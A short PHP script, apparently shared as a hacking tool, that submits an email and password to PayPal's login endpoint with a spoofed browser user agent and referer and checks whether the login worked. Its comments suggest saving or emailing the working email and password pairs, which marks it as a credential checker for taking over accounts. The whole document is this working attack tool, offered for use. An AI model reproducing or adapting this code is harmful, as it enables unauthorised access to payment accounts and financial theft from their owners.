Script made by NoNe
//Script made by NoNe
//$email = "email@domain.com";
//$oven = "oven";
$email = str_replace("@", "%40", $email);
$postinfo = "login_email=" . $email . "&login_password=" . $oven . "&submit.x=Log+In&form_charset=UTF-8";
$url="https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0");
curl_setopt($ch, CURLOPT_REFERER, "https://www.paypal.com/");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postinfo);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
$content = curl_exec ($ch);
curl_close ($ch);
//uncomment the next line if you want to be able to see what the output is..
//echo $content;
if(strstr($store, "webscr?cmd=_login-done")) {
//What to do if it can log in, you can make it send the info to your email or
//just fopen a file and write the working email and pass...
}
?>